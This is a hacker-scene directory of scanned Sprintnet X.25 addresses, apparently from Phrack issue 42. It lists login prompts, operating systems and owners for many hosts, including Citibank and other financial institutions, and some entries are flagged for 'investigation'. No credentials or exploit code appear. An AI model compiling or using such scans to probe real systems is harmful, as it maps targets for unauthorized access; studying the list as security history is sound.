- 202 3603 *
- 202 3604 *
- 202 3605 *
- 202 3606 *
- 202 3611 *
- 202 3612 *
- 202 3613 *
- 202 3614 *
- 202 3630 *
- 202 4220
- 202 4222
- 202 4226 MSG10-RJRT TERMINAL-ID:GSSCXA63 IS NOW IN SESSION
- 202 60031 VAX/VMS V5.4-2
- 202 60033 Unix/SunOS Welcome to QHDS!
- 202 60035 *
- 202 60036 NETX A0A0VD00 READY FOR LOGON
- 202 60039 Unix/SunOS (QHDS.MXBC)
- 202 60040 Lexis and Nexis
- 202 60043 *
- 202 60056
- 202 60058 *
- 202 60059 *
- 202 60060 *
- 202 60064 *
- 202 60068 PIN:
- 202 60069 PIN:
- 202 60070 PIN:
- 202 60071 PIN:
- 202 60073 *
-
-
-
-
- 203 - Connecticut Scanned: [0 - 500]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 203 22 VM/CMS
- 203 28 VM/CMS
- 203 50 CONNECTED TO PACKET/74
- 203 60 $ GEN*NET Private Switched Data Network
- 203 61 *
- 203 62 VAX/VMS ACM Enter SecurID PASSCODE:
- 203 66 Login Please :
- 203 67 Login Please :
- 203 77 *
- 203 78 $ Novell Netware Access Server (DDS)
- 203 79 *
- 203 105 $ outdial (203)
- 203 120 $ outdial (203)
- 203 121 $ outdial (203)
- 203 136 PRIME PRIMENET 20.2.7 SYSA
- 203 159 $ access barred
- 203 160 *
- 203 161 $ Novell Netware Access Server (INFOSYS)
- 203 165 Panoramic, Inc. PLEASE LOGON: help
- 203 242 Login Please :
- 203 274 $ ACF/VTAM
- 203 277 * (incoming call barred)
- 203 310
- 203 317
- 203 346 *
- 203 347 SB >
- 203 350 *
- 203 362 * (incoming call barred)
- 203 367 CONNECTED TO PACKET/74
- 203 434 $ (hangs up)
- 203 435 $ ACF/VTAM
- 203 438 $ (echo)
- 203 442 $ (echo)
- 203 452 *
- 203 455
- 203 458 * (incoming call barred)
- 203 463 *
- 203 465 *
-
-
-
-
- 205 - Alabama Scanned: 0 - 300
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 205 237 *
- 205 245 *
- 205 246 *
-
-
-
-
- 206 - Washington Scanned: [0 - 500]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 206 40 $ Prime PRIMENET 23.2.0.r26 P6450
- 206 60 *
- 206 65 PRIME PRIMENET 22.1.4 OAD
- 206 66
- 206 67 $
- 206 138 $ MHP201A UPK0BY60 * VERSION 5.5.4 *.
- 206 139 $ Wang VS Logon
- 206 154 $ DTC THE SEATTLE DTC (DTC01.MACON.USOPM)
- 206 158 VAX/VMS Username:
- 206 167 * (incoming call barred)
- 206 170 $ hp-3000
- 206 173 $ Renex Connect, SN-00100201
- 206 205 $ outdial (206)
- 206 206 $ outdial (206)
- 206 208 $ outdial (206)
- 206 239.1$ + Log on please
- 206 240.1$ ***investigate***
- 206 250 $ logins to this workstation temp. barred
- 206 251 $ Wang SYSTEM TWO (TACOMA:TACOMA)
- 206 351 *
- 206 352 *
- 206 357 $ HP-3000
- 206 360 CUSTOMER ID:
- 206 368 *
- 206 369 *
- 206 371 $
- 206 375 Prime PRIMENET 23.2.0.r26 DZ-BLV
- 206 430 $ 911 Monitor HATSLNCT is currently not available
- 206 470 VAX/VMS
- 206 479 $ + Log on please
-
-
-
-
- 207 - Maine Scanned: 0 - 300
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 207 40 *
- 207 260 ??? Please login:
-
-
-
-
- 208 - Idaho Scanned: 0 - 300
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 208 236 *
- 208 250 $ USER ID
- 208 252 Welcome to the NET, X.29 Password:
-
-
-
-
- 209 - California Scanned: 0 - 300
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 209 241 *
- 209 243 *
- 209 245 *
- 209 246 *
- 209 270 $ VAX/VMS Continental PET Technologies, MODESTO
- 209 273 DACS III ***investigate***
-
-
-
-
- 211 - Dun & Broadstreet Scanned: various
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 211 1140 D&B terminal
- 211 1142 D&B terminal
- 211 1145 VAX/VMS on VBH302
- 211 1240 Please enter your terminal id; '?' for MENU
- 211 1242 D&B terminal
- 211 1244 Please enter your terminal id; '?' for MENU
- 211 1245 ??? GNETMAIL
- 211 2150 Prime
- 211 2240 DunsNet's User Verification Service
- 211 2247 DUNSCENTER (connects to many machines)
- 211 2249 ID?>
- 211 2255 ID?>
- 211 2450 Prime
- 211 2451 Prime
- 211 3290 CMS? IDC/370 Ready-
- 211 3291 CMS? IDC/370 Ready-
- 211 3292 CMS? IDC/370 Ready-
- 211 3390 CMS? IDC/370 Ready-
- 211 3391 CMS? IDC/370 Ready-
- 211 3392 CMS? IDC/370 Ready-
- 211 3490 CMS? IDC/370 Ready-
- 211 4190 DunsNet's User Verification Service
- 211 4240 Enter service code -
- 211 4241 Enter service code -
- 211 5140 DTC Nielsen Household Services (DTC03.NY.NPD)
- 211 5240 VAX/VMS GUMBY...
- 211 5290 DTC Nielsen Household Services (DTC02.NY.NPD)
- 211 6140 PLEASE ENTER SUBSCRIBERID;PASSWORD
- 211 6141 A. C. Nielsen Information Center.
- 211 6142 A. C. Nielsen Information Center.
- 211 6145
- 211 6190 PLEASE ENTER SUBSCRIBERID;PASSWORD
- 211 6240 A. C. Nielsen Information Center.
- 211 6250 ??? USERNAME?
- 211 6290 PLEASE ENTER SUBSCRIBERID;PASSWORD
- 211 8140 DIALOG INFORMATION SERVICES
- 211 8142 VAX/VMS Username:
- 211 11140 VM/CMS VM/370 ONLINE--
- 211 11142 VM/CMS VM/370 ONLINE--
- 211 11144 VAX/VMS Username:
- 211 13190 D&B terminal (in spanish)
- 211 13191 D&B terminal
- 211 14110 Renex Connect, Enter password -
- 211 15140 NEODATA SERVICES NETWORK
-
-
-
-
- 212 - New York Scanned: [0 - 3000] & various
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 212 30 ENTER ID:
- 212 31 $ VM/CMS
- 212 34 *
- 212 40 PLEASE ENTER /LOGIN
- 212 41 MHP201A UPK05173 APPLICATION:
- 212 48 *
- 212 52 $ Prime
- 212 53 VAX/VMS
- 212 73 $ Prime
- 212 79 ENTER ID:
- 212 100 VAX/VMS Username:
- 212 101 VAX/VMS Username:
- 212 102 **** Invalid sign-on, please try again ****
- 212 103 VAX/VMS Username:
- 212 104 **** Invalid sign-on, please try again ****
- 212 105 **** Invalid sign-on, please try again ****
- 212 106 **** Invalid sign-on, please try again ****
- 212 108 **** Invalid sign-on, please try again ****
- 212 109 **** Invalid sign-on, please try again ****
- 212 110 **** Invalid sign-on, please try again ****
- 212 112 Shearson Lehman Brothers
- 212 124 $ VAX/VMS Username:
- 212 130 you are now connected to the host computer
- 212 131 Shearson Lehman Brothers
- 212 137 Prime PRIMENET 22.1.1.R17.STS.6 NY60
- 212 145 ENTER ACCESS ID:
- 212 146 ENTER ACCESS ID:
- 212 152 VAX/VMS Username:
- 212 170 $ TWX2V LOGGED INTO AN INFORMATION SERVICES NETWORK
- 212 172 $ TWX2V LOGGED INTO AN INFORMATION SERVICES NETWORK
- 212 174 $ TWX2V LOGGED INTO AN INFORMATION SERVICES NETWORK
- 212 197 BANKERS TRUST
- 212 202 VAX/VMS Username:
- 212 226 USER ID ?
- 212 231 $ VM/CMS
- 212 242 ENTER IDENTIFICATION:
- 212 255 VAX/VMS (PB2 - PBS Development System)
- 212 259 VAX/VMS (NYTASD - TAS SYSTEM)
- 212 260 Bankers Trust Online
- 212 274 $ INVALID INPUT
- 212 275 Bankers Trust Online
- 212 276 *
- 212 277 ****POSSIBLE DATA LOSS 00 00****
- 212 278 Bankers Trust Online
- 212 279 User: (RSTS V9.3-20)
- 212 285 Invalid login attempt
- 212 306 *
- 212 315 $ outdial (212)
- 212 320 ENTER IDENTIFICATION:
- 212 321 ENTER IDENTIFICATION:
- 212 322 $ COMMAND UNRECOGNIZED
- 212 336 *
- 212 344 *
- 212 345 Prime PRIMENET 23.2.0.R32 NMSG
- 212 352 *
- 212 359 (drops connection right away)
- 212 376 -> 201 950 Bankers Trust Online
- 212 430 -> 312 59 Id Please: User Id: Password:
- 212 432 *
- 212 437 *
- 212 438 *
- 212 440 *
- 212 444 Prime PRIMENET 21.0.7.R31 EMCO
- 212 446 $ VAX/VMS
- 212 449 $ VM/CMS
- 212 500 enter a for astra
- 212 501 enter a for astra
- 212 502 enter a for astra
- 212 503 enter a for astra
- 212 504 enter a for astra
- 212 505 enter a for astra
- 212 509 $ Transamerican Leasing (White Plains Data Center)
- 212 539 (drops connections right away)
- 212 546 $ APLICACAO:
- 212 549 $ BT-Tymnet Gateway
- 212 561 VAX/VMS Username:
- 212 571 You are not authorized to connect to this machine.
- 212 572 $ No access to this DTE.
- 212 580 enter a for astra
- 212 603 Shearson Lehman Brothers
- 212 615 Shearson Lehman Brothers
- 212 623 Shearson Lehman Brothers
- 212 693 $ USER ID
- 212 703 Unix
- 212 704 Unix
- 212 713 Prime PRIMENET 22.1.1.R17.STS.6 NY60
- 212 726 $ VAX/VMS
- 212 731
- 212 970 *
- 212 971 *
- 212 972 *
- 212 973 *
- 212 974 *
- 212 975 *
- 212 976 *
- 212 977 *
- 212 978 *
- 212 979 *
- 212 1000 $ Enter ID:
- 212 1001 $ Enter ID:
- 212 1002 $ Enter ID:
- 212 1004 $ Enter ID:
- 212 1009 $ outdial (212)
- 212 1045 $ HP-3000 White & Case - HP 3000 Computer System
- 212 1046 *
- 212 1049 APPLICATION:
- 212 1050 NSP READY?
- 212 1052 Prime PRIMENET 20.2.4.R11 FTC0
- 212 1053 VAX/VMS
- 212 1065 $ AOS Track Data System 12
- 212 1069 #
- 212 1071 $ GS/1 CS/100T>
- 212 1072 $ GS/1 CS/100T>
- 212 1076 NSP READY
- 212 1233 *
- 212 1355 *
- 212 1356 *
- 212 1367 You are not authorized to connect to this machine.
- 212 1373 enter a for astra
- 212 1450 RadioSuisse Services.
- 212 1469
- 212 1477 n042ppp> enter system id
- 212 1478 n042ppp> enter system id
- 212 2050B Unix softdollar login:
- 212 2050D Unix softdollar login:
- 212 2060 $ T.S.S.G
- 212 2061 $ Boston Safe Deposit and Trust Company
- 212 2062 $ TWX40 LOGGED INTO AN INFORMATION SERVICES NETWORK
- 212 2071 VM/CMS GSERV
- 212 2079 VM/CMS GSERV
- 212 2130 $ (echo)
- 212 2131 $ (echo)
- 212 2134 $ (echo)
- 212 2135 $ (echo)
- 212 2230 $ (echo)
- 212 2231 $ (echo)
- 212 2234 $ (echo)
- 212 2235 $ (echo)
- 212 2245 $ Finlay Fine Jewelry Corp.
- 212 2250 VAX/VMS Username:
- 212 2251 **** Invalid sign-on, please try again ****
- 212 2252 **** Invalid sign-on, please try again ****
- 212 2253 **** Invalid sign-on, please try again ****
- 212 2254 **** Invalid sign-on, please try again ****
- 212 2270 **** Invalid sign-on, please try again ****
- 212 2271 **** Invalid sign-on, please try again ****
- 212 2272 **** Invalid sign-on, please try again ****
- 212 2273 **** Invalid sign-on, please try again ****
- 212 2274 **** Invalid sign-on, please try again ****
- 212 60002 You are not authorized to connect to this machine.
- 212 60007 You are not authorized to connect to this machine.
- 212 60010 You are not authorized to connect to this machine.
- 212 60031 VM/CMS
- 212 60032 ENTER ID:
- 212 60033 Prime CDA Online Services
- 212 60034 CHANNEL 03/009. ENTER RESOURCE
- 212 60037 VAX/VMS MuniView
- 212 60044 *
- 212 60051 *
- 212 60055 USER ID
-
-
-
-
- 213 - California Scanned: [0 - 2000]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 213 21 Prime PRIMENET 23.2.0.R32 C6
- 213 22 Prime PRIMENET 23.2.0.R32 D6
- 213 23 $ outdial (213)
- 213 24 Marketron Research and Sales System
- 213 25 $ outdial (213)
- 213 35 Marketron Research and Sales System
- 213 41 $ (echo)
- 213 45 $ ENTER NETWORK SIGN-ON:
- 213 50 $ (echo)
- 213 52 $ Prime
- 213 53 CONNECTED TO PACKET/74
- 213 55 CONNECTED TO PACKET/74
- 213 56 CONNECTED TO PACKET/74
- 213 60 CONNECTED TO PACKET/74
- 213 61 CONNECTED TO PACKET/74
- 213 68 *
- 213 70 *
- 213 102 Prime PRIMENET 21.0.7.R10 TRWE.A
- 213 103 $ outdial (213)
- 213 105 Prime PRIMENET 22.1.3.beta1 SWOP
- 213 121 Prime PRIMENET 23.0.0 SWWE1
- 213 122 Unix Computervision Los Angeles District Admin System
- 213 123 Prime PRIMENET 23.3.0.r29 SWWA1
- 213 129 Prime PRIMENET 22.0.3vA CALMA1
- 213 151 Prime PRIMENET 22.1.3 CSSWR1
- 213 154 Prime PRIMENET 22.1.1.R27 SWWCR
- 213 155 Prime PRIMENET 22.1.3 CS.LA
- 213 199 Prime PRIMENET 23.2.0.R32 C6
- 213 220A TELENET ASYNC TO 3270 SERVICE
- 213 221A TELENET ASYNC TO 3270 SERVICE
- 213 248 *
- 213 249 *
- 213 262 *
- 213 265 *
- 213 340 Prime PRIMENET 23.2.0 TRNGW
- 213 336 *
- 213 337 $ HP-3000
- 213 351 Unix/SunOS SunOS Release 4.1.2 (X25)
- 213 357 Unix/SunOS SunOS Release 4.1.1 (X25)
- 213 359 Unix
- 213 371 *
- 213 373 HP-3000 SAGAN.HP.COM
- 213 412 $ outdial (213)
- 213 413 $ outdial (213)
- 213 540 *
- 213 541 *
- 213 542 *
- 213 543 *
- 213 660
- 213 1052 $ Environment Control Monitor
- 213 1053 $ Unix milpitas login:
- 213 1054 *
- 213 1055 $ Environment Control Monitor
- 213 1056 *
- 213 1057 $ Denver Service System (ECM)
- 213 1064 *
- 213 1065 HP-3000 EXPECTED HELLO, :JOB, :DATA, OR (CMD) AS LOGON.
- 213 1073
- 213 1079 *
- 213 1160 *
- 213 1418 *
- 213 1419 *
- 213 1420 *
- 213 1421 *
- 213 1422 *
- 213 1423 *
- 213 1424 *
- 213 1425 *
- 213 1426 *
- 213 1427 *
- 213 1428 *
- 213 1429 *
- 213 1430 *
- 213 1450 MACNET:
-
-
-
-
- 214 - Texas Scanned: [0 - 2000]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 214 20 SIM3278
- 214 21 SIM3278
- 214 22 $ outdial (214)
- 214 42 VAX/VMS Username:
- 214 60 HP-3000 DELTA.RCO.NTI
- 214 68 $ VAX/VMS GTECVC
- 214 76 Cyber Power Computing Cyber Service
- 214 231
- 214 240
- 214 245 *
- 214 337
- 214 352 IST451I ENTER VALID COMMAND - NETX B0A8VD00
- 214 355 *
- 214 358 *
- 214 364 $ VAX/VMS GTECVC
- 214 366 Renex Connect, Enter service code -
- 214 371 Prime PRIMENET 21.0.2S GCAD..
- 214 372
- 214 373 *
- 214 1031 *
- 214 1032 *
- 214 1033 *
- 214 1034 $ (echo)
- 214 1035 *
- 214 1040 $ (echo)
- 214 1048 Renex Connect, Enter terminal type or "M" for menu
- 214 1070 BT-Tymnet Gateway please log in: information
- 214 1071 Cyber You may enter CDCNET commands.
- 214 1075 Cyber You may enter CDCNET commands.
- 214 1131 *
- 214 1151 VAX/VMS Username:
- 214 1152 *
- 214 1153
- 214 1158 *
- 214 1161 VAX/VMS Username:
- 214 1230 *
- 214 1237
- 214 1238
- 214 1241 *
- 214 1242 *
- 214 1243 *
- 214 1244 *
- 214 1245 *
- 214 1246 *
- 214 1247 *
- 214 1248 *
- 214 1249 *
- 214 1250 *
- 214 1251 *
- 214 1252 *
- 214 1253 *
- 214 1254 *
- 214 1255 *
- 214 1256 *
- 214 1257 *
- 214 1258 *
- 214 1260 *
- 214 1261 *
- 214 1262 *
- 214 1263 *
- 214 1264 *
- 214 1265 VAX/VMS Username:
- 214 1277 *
- 214 1278 *
- 214 1334 *
- 214 1335 *
- 214 1336 *
- 214 1337 *
- 214 1338 *
- 214 1339 *
- 214 1340 *
- 214 1341 *
- 214 1343 *
- 214 1358 *
- 214 1359 *
- 214 1362 VAX/VMS Username:
- 214 1363 *
- 214 1364 *
- 214 1365 *
- 214 1366 *
-
-
-
-
- 215 - Pennsylvania Scanned: 0 - 300
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 215 5 $ outdial (215)
- 215 22 $ outdial (215)
- 215 30 *
- 215 38 *
- 215 40 VU/TEXT
- 215 44 *
- 215 55 *
- 215 60 *
- 215 66 Prime NewsNet
- 215 112 $ outdial (215)
- 215 121 VM/CMS TOWERS PERRIN ONLINE--PHILA
- 215 134 *
- 215 135 VU/TEXT
- 215 139 *
- 215 140 VU/TEXT
- 215 143 *
- 215 154
- 215 163 Unix
- 215 164 Unix
- 215 165 Unix
- 215 166 Unix
- 215 167 Unix
- 215 168 Unix
- 215 169 Unix
- 215 170 Unix
- 215 171 Unix
- 215 172 *
- 215 173 *
- 215 176 *
- 215 179 Unix PLASPEC Engineering & Marketing Network
- 215 231
- 215 251 Unix
- 215 252 Unix
- 215 253 Unix
- 215 254 Unix
- 215 255 Unix
- 215 261 VAX/VMS File Transfer and Gateway Service Node ARGO
- 215 262
- 215 263
- 215 263
- 215 264 %@CVTTAUD@dUYECVGUIiED
- 215 270 CONNECTED TO PACKET/400
- 215 530 $
- 215 531 $
- 215 532 $
- 215 533 $
- 215 534 $
- 215 535 $
- 215 536 $
- 215 537 $
- 215 538 $
- 215 539 $
- 215 540 $
- 215 541 $
-
-
-
-
- 216 - Ohio Scanned: [0 - 2000]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 216 20 $ outdial (216)
- 216 21 $ outdial (216)
- 216 38 VAX/VMS Username:
- 216 49
- 216 51 *
- 216 59 *
- 216 60 APPLICATION:
- 216 63 *
- 216 64 Prime PRIMENET 20.2.4 LIPC
- 216 74 $ hp-x000
- 216 75 *
- 216 120 $ outdial (216)
- 216 134 *
- 216 135 *
- 216 140
- 216 201 $ HP-3000
- 216 202 *
- 216 203 *
- 216 204 *
- 216 205 *
- 216 209 *
- 216 210 *
- 216 211 *
- 216 212 $ HP-3000
- 216 530 *
- 216 531 *
- 216 532 *
- 216 533 *
- 216 534 *
- 216 535 *
- 216 536 *
- 216 537 *
- 216 538 *
- 216 539 $ (echo)
- 216 1351 Prime PRIMENET 22.1.4 OPSPRO
- 216 1352 Prime Good morning
- 216 1353 Prime PRIMENET 22.1.4 OPSPRO
- 216 1354 Prime Good morning
- 216 1355 $ Prime PRIMENET 22.1.4.R63 OPSSEC
- 216 1356 *
- 216 1357 Prime Good morning
- 216 1358 Prime PRIMENET 22.1.4 OPSPRO
- 216 1369 *
- 216 1370 *
- 216 1371 *
- 216 1372 *
-
-
-
- 217 - Illinois Scanned: 0 - 200
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 217 45 *
- 217 46 *
-
-
-
-
- 219 - Indiana Scanned: 0 - 200
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 219 3 Prime PRIMENET 22.1.0vA2 NODE.0
- 219 8 Prime PRIMENET 23.2.0vA NODE.8
- 219 9 ENTER GROUP NAME>
- 219 10 Lincoln National Corporation
- 219 35 $ MHP201A ZMA0PZ10 * VERSION 6.0.1 *.
- 219 140 Prime PRIMENET 23.2.0vA CS.FTW
- 219 150 *
-
-
-
- 222 - unknown Scanned: various
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 222 100 Prime
- 222 140 Prime
- 222 320 Prime
- 222 340
-
-
-
-
- 223 - Citibank Scanned: various
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 223 1 $ GS/1 CITITRUST/WIN Gateway! (Toll 25 cents)
- 223 6 PLEASE ENTER TRANSACTION ID:
- 223 10 Prime
- 223 11 Prime
- 223 13 Prime
- 223 15 Prime
- 223 17 CDS DATA PROCESSING SUPPORT
- 223 19 $ HP-3000
- 223 26 NETWORK USER VALIDATION.
- 223 31
- 223 32 enter a for astra
- 223 34 NETWORK USER VALIDATION.
- 223 35 VAX/VMS TREASURY PRODUCTS
- 223 39 Major BBS GALACTICOMM User-ID? new
- 223 40 Global Report from Citicorp
- 223 41 VOS (other systems connect from there)
- 223 42 CITICORP/CITIBANK - 0005,PORT 3
- 223 46 $ Enter Secure Access ID -02->
- 223 47 CCMS
- 223 48A CITIBANK ,PORT 5
- 223 50 Prime
- 223 54 CITI CASH MANAGEMENT NETWORK -
- 223 55 NETWORK USER VALIDATION.
- 223 57
- 223 65 VOS
- 223 68 $ Citimail II
- 223 70 ELECTRONIC CHECK MANAGER ENTER 'ECM'
- 223 71 ""
- 223 74A ""
- 223 79 VAX/VMS Audit login --- Your session will be recorded.
- 223 87 VOS CitiShare Milwaukee, Wisconsin
- 223 91 VAX/VMS Unauthorized Use Is Prohibited
- 223 92 <<please enter logon>>
- 223 93 Major BBS? Citibank Customer Delivery Systems (#95298116)
- 223 94 <<ENTER PASSWORD>>
- 223 95
- 223 96 <<ENTER PASSWORD>>
- 223 103 <<ENTER PASSWORD>>
- 223 104 $ VAX/VMS
- 223 106
- 223 175 enter a for astra
- 223 176 VAX/VMS
- 223 178 NETWORK USER VALIDATION.
- 223 179 $
- 223 183 Prime
- 223 184 Prime PRIMENET 23.2.0vB PROD-C
- 223 185 Citibank Hongkong
- 223 186 Citibank Hongking
- 223 187 $ DECserver
- 223 188 GS/1 CITITRUST/WIN Gateway! (Toll 25 cents)
- 223 189 $ DECserver
- 223 191 (need x.citipc terminal emulator)
- 223 193 Prime
- 223 194 VAX/VMS
- 223 199 $
- 223 200 NETWORK USER VALIDATION.
- 223 201 C/C/M INT'L 3 ENTER YOUR ID : [ ]
- 223 202 C/C/M INT'L 4 ENTER YOUR ID : [ ]
- 223 204 C/C/M INT'L 6 ENTER YOUR ID : [ ]
- 223 208 C/C/M ENTER YOUR ID : [ ]
- 223 210 NETWORK USER VALIDATION.
- 223 211 CITI Master Policy Bulletin Board
- 223 212 ""
- 223 216 VAX/VMS *** Unauthorized Access Prohibited ***
- 223 217
- 223 218
- 223 222 Unix SysV Citibank PDC Registration System
- 223 223 CITIBANK SINGAPORE
- 223 223 Unix discovery login:
- 223 227 Prime PRIMENET 23.2.0.R43 BASCOS
- 223 234 VCP-1000 Terminal Server
- 223 256 VOS CITIBANK - NSO NEW YORK, NY
- 223 258 VOS CITIBANK - NSO NEW YORK, NY
- 223 259 VOS CITIBANK - NSO NEW YORK, NY
- 223 260 VAX/VMS Unauthorized Use Is Prohibited
- 223 503 ??? :
- 223 508
- 223 510 VOS Citibank Puerto Rico
- 223 512 VAX/VMS #6 Node: NYF050
- 223 513 CITI CASH MANAGEMENT NETWORK -
- 223 515 Prime PRIMENET 23.2.0.R43 BASCOS
- 223 519 Prime PRIMENET 23.2.0.R43 OBSPOM
- 223 520 $ CitiMail II
- 223 521 $ Major BBS User-ID? new
- 223 523 Prime PRIMENET 23.2.0.R43 LATPRI
- 223 524 $ GS/1 Cititrust (Cayman)'s WIN Gateway!
- 223 527 INVALID COMMAND SYNTAX
- 223 600
- 223 1000 CITI CASH MANAGEMENT NETWORK
- 223 1002
- 223 3002 NETWORK USER VALIDATION.
- 223 3003 ??? Welcome to Citiswitch, New York
- 223 3008 ??? ""
- 223 3011 Unix DG/UX Release 4.32. AViiON (gnccsvr)
- 223 3012 Unix DG/UX Release 4.32. AViiON (gnccsvr)
- 223 3020 Prime
- 223 3030 $ VAX/VMS
- 223 3031 *
- 223 3042A CITI Master Policy Bulletin Board
- 223 3044
- 223 3046
- 223 3048 $ DECserver
- 223 3052 Unix DG/UX Release 4.32. AViiON (parsvr)
- 223 3056 *
- 223 3060B TBBS Citicorp Futures Corp.
- 223 3064 $
- 223 3066
- 223 3067 NETWORK USER VALIDATION.
- 223 3070 *
- 223 3074 NETWORK USER VALIDATION.
- 223 3075A Port Selec Systems: EQX/SUP,SECURID,TS,TS1,TS2,TS3,PBX
- 223 3077
- 223 3080A PERSONNEL SERVICES & TECHNOLOGY'S DATA PABX NETWORK.
- 223 3082
- 223 3083 ENQUIRE GSM User ID?
- 223 3086 VOS Citishare
- 223 3088 HP-3000 SYSTEMC.HP.CITIBANK
- 223 4700 *
- 223 8050 ILLEGAL SOURCE ADDRESS 0B 80
- 223 8052
- 223 8053 TYPE .
- 223 8056 ILLEGAL SOURCE ADDRESS 0B 80
- 223 8057 *
- 223 8058 ILLEGAL SOURCE ADDRESS 0B 80
- 223 8059 ILLEGAL SOURCE ADDRESS 0B 80
- 223 8100 Prime PRIMENET 23.1.0 LATRG1
- 223 8101 Prime PRIMENET 23.1.0 LATRG2
- 223 8201
- 223 8202 Enter password:
- 223 8602 Prime PRIMENET 23.2.0.R43 OBSPOM
- 223 8804 11 - FORMAT ERROR
- 223 10009 I/P LOGIN CODE
- 223 10010 I/P LOGIN CODE
- 223 10015 I/P LOGIN CODE
- 223 10030 UMP 15, TP (DEV A) >
- 223 10032 UMP 2, XGATE (NODE 6)
- 223 10050 I/P LOGIN CODE
-
-
-
- ==Phrack Magazine==
-
- Volume Four, Issue Forty-Two, File 9 of 14
-
- <Sprintnet Directory Part 2>
-
-
- 224 - Citibank Scanneds: various
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 224 1 CITIBANK
- 224 2 VAX/VMS Global Report
- 224 4 Prime PRIMENET 23.2.0vB PROD-A
- 224 5 DECserver
- 224 6 CITIBANK CANADA-CB1
- 224 10 CITIBANK BRASIL
- 224 11 C/C/M
- 224 12 Prime PRIMENET 23.2.0vA OZPROD
- 224 14 C/C/M
- 224 16 CITIBANK FRANKFURT
- 224 17 DECserver
- 224 20 DECserver
- 224 21
- 224 22
- 224 23 CITIBANK N.A. BAHRAIN - BOOK SYSTEM
- 224 24 NETWORK USER VALIDATION.
- 224 26
- 224 27 CITIBANK JOHANNESBURG
- 224 30 CITIBANK PIRAEUS
- 224 31 ADAM_COSMOS
- 224 32 CITIBANK LONDON
- 224 33 CITIBANK PARIS
- 224 34 CITIBANK LONDON
- 224 35 DUBLIN_COSMOS
- 224 36 CITIBANK ATG - TEST8.2
- 224 37
- 224 38 CITIBANK LEWISHAM
- 224 39 CITIBANK MILAN
- 224 40
- 224 41 CITICORP/CITIBANK
- 224 42 CITICORP/CITIBANK
- 224 43 VIENNA_COSMOS
- 224 44 CITIBANK LONDON
- 224 45 NORDIC_COSMOS
- 224 46 NORDIC_COSMOS
- 224 47 Enter Secure Access ID -02->
- 224 48 Prime CONNECTED TO 03 35-50
- 224 49 CITIBANK FRANKFURT
- 224 50 CITICORP/CITIBANK
- 224 51 CITICORP CASH MANAGEMENT SERVICES
- 224 53 JERSEY_COSMOS
- 224 55 SIGN-ON NAO ACEITO
- 224 56 DECserver
- 224 57 VAX/VMS
- 224 61 CITIBANK SYDNEY
- 224 62 CITIBANK SINGAPORE
- 224 63 CITIBANK MANILA
- 224 64 Prime
- 224 65 CITIBANK SINGAPORE
- 224 68 DECserver
- 224 70 London Branch Miniswitch
- 224 71 CCM - Citi Cash Manager
- 224 73 DECserver
- 224 74 CITI CASH MANAGEMENT NETWORK
- 224 75 IBI MIS Systems
- 224 76
- 224 78 CITIBANK HONG KONG
- 224 79 CITIBANK
- 224 80 VAX/VMS UNAUTHORIZED ACCESS to this SYSTEM is PROHIBITED
- 224 81
- 224 82 Prime PRIMENET 23.2.0vB PROD-C
- 224 83 IBM 3708
- 224 85
- 224 86 Prime PRIMENET 23.1.0 LATRG1
- 227 87 DECserver
- 224 89 Prime PRIMENET 23.1.0 LATRG1
- 224 91 Prime
- 224 92 VCP-1000 Terminal Server (decserver clone)
- 224 93
- 224 95 BMS==>
- 224 98 C/C/M
- 224 100 Cityswitch
- 224 104 BMS==>
- 224 105
- 224 108
- 224 110
- 224 113 Prime PRIMENET 23.1.0 LATRG2
- 224 122 VAX/VMS? Global Report from Citicorp
- 224 125 PLEASE ENTER TRANSACTION ID:
- 224 128 Prime PRIMENET 23.2.0.R43 LATPRI
- 224 129
- 224 130 VAX/VMS GLOBAL TREASURY PRODUCTS
- 224 132 Prime PRIMENET 23.2.0vB PROD-B
- 224 135 VAX/VMS CMAPD - SRPC Vax Development System
- 224 136 VAX/VMS #6Node: NYF050
- 224 137 HP-3000
- 224 138
- 224 139 VAX/VMS (restricted access system)
- 224 140 VAX/VMS ""
- 224 141 :
- 224 142 C/C/M
- 224 143 CITI CASH MANAGEMENT NETWORK
- 224 147 C/C/M
- 224 148 CITIBANK LONDON
- 224 149 LISBON_COSMOS
- 224 150 DEC Welcome to the DEC Gateway
- 224 153 CITI CASH MANAGEMENT NETWORK
- 224 155 Prime PRIMENET 23.2.0vB PROD-B
- 224 157 DecServer
- 224 158
